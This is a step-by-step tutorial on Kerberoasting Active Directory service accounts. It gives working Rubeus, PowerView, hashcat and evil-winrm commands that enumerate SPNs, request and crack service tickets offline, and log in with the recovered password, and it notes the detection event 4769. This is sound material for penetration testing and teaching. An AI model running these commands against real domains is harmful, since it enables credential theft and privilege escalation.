This post walks through a Kerberoasting attack using Rubeus. Make sure you have appropriate authorization to perform security testing within your environment.
Prerequisites:
- A Windows machine in an Active Directory domain.
- Rubeus.exe (can be compiled from GitHub).
- A domain user account (even low-privileged) to request service tickets.
- Hashcat for offline cracking.
Step 1: Enumerate Service Principal Names (SPNs)
Use the ActiveDirectory PowerShell module to list user accounts that have at least one SPN set:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
PowerView:
Get-NetUser -SPN
Either command returns the usernames and SPNs of the domain's service accounts; these are the Kerberoasting targets. Machine accounts also carry SPNs, but their passwords are long and random, so user accounts with SPNs are the ones worth roasting.
Step 2: Request Kerberos Service Tickets
Run Rubeus to request service tickets for accounts associated with SPNs.
Rubeus.exe kerberoast
This requests a TGS (service ticket) for every SPN found and prints the encrypted part of each ticket in hashcat format. The ticket is encrypted with a key derived from the service account's password, which is why it can be cracked offline, and any authenticated domain user may request it. Each request is logged on the domain controller as a ticket-request event (4769), so expect it to be visible to the blue team.
You can also request tickets for specific users:
Rubeus.exe kerberoast /user:svc-account
Step 3: Extract and Save Hashes
Rubeus will output a hash similar to:
$krb5tgs$23$*svc-account$DOMAIN$HTTP/service.domain.com*$e52cac67419a9a22$...
Save the hashes to a file (hashes.txt) for offline cracking. The /outfile option writes one hash per line without the console line wrapping, which is the form Hashcat expects:
Rubeus.exe kerberoast /outfile:hashes.txt
Step 4: Crack the Hash Offline (Using Hashcat)
Use Hashcat to crack the hash. This is not an NTLM hash: mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC), and the 23 in the hash is that encryption type. If the account only offers AES (etype 17 or 18, shown as $krb5tgs$17$ or $krb5tgs$18$), use mode 19600 or 19700 instead; those crack far more slowly. The --force flag only suppresses Hashcat's warnings (for example about unsupported OpenCL drivers) and can be omitted on a properly configured system:
hashcat -m 13100 hashes.txt /path/to/wordlist.txt --force
If the service account has a weak password, Hashcat will recover it.
Step 5: Use the Cracked Password
Once cracked, authenticate using Evil-WinRM, RDP, or other tools:
evil-winrm -i <target-IP> -u svc-account -p <cracked-password>
If the compromised account has privileged access, this can lead to privilege escalation.